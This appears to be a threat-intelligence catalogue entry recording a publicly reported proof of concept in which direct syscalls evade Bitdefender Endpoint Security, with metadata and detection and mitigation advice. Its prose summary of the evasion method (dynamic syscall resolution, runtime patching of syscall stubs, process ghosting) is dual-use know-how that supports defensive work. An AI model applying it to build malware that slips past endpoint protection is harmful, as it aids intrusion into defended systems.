Bypass Record

Direct Syscalls × Bitdefender Endpoint Security

A publicly-reported instance of Direct Syscalls bypassing Bitdefender Endpoint Security, recorded with its original source. Factual record; no assessment of any specific deployment.

Product

Bitdefender Endpoint Security

Technique

Direct Syscalls

MITRE ATT&CK

T1106

Confidence

Medium

Severity

High

Status

poc

Disclosed

2024-05-08

Config / version noted

Not stated

Provenance

github.com
disclosed 2024-05-08 · original source · via exa

Reported as

The author claims successful bypass of Bitdefender and Microsoft Defender for Endpoint.

Mechanism

Combines direct syscalls with dynamic SSN resolution to avoid user-mode EDR hooks. Uses an egg-hunt technique to replace syscall instructions with random bytes in the stub, patching them back at runtime to evade static detection. Also employs Windows API forking (process ghosting/forking) and random prototypes/procedures to hinder static analysis.

Detection & mitigation

Monitor for processes making direct syscall instructions (e.g., syscall/sysenter) from non-standard or unhooked ntdll.dll regions, or using dynamic syscall number resolution. Deploy kernel-mode callbacks (e.g., PsSetCreateProcessNotifyRoutine) and ETW providers to detect process ghosting/forking anomalies, and enforce application control policies to block unsigned or untrusted executables.

Direct Syscalls has also been recorded against

Microsoft Sophos

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.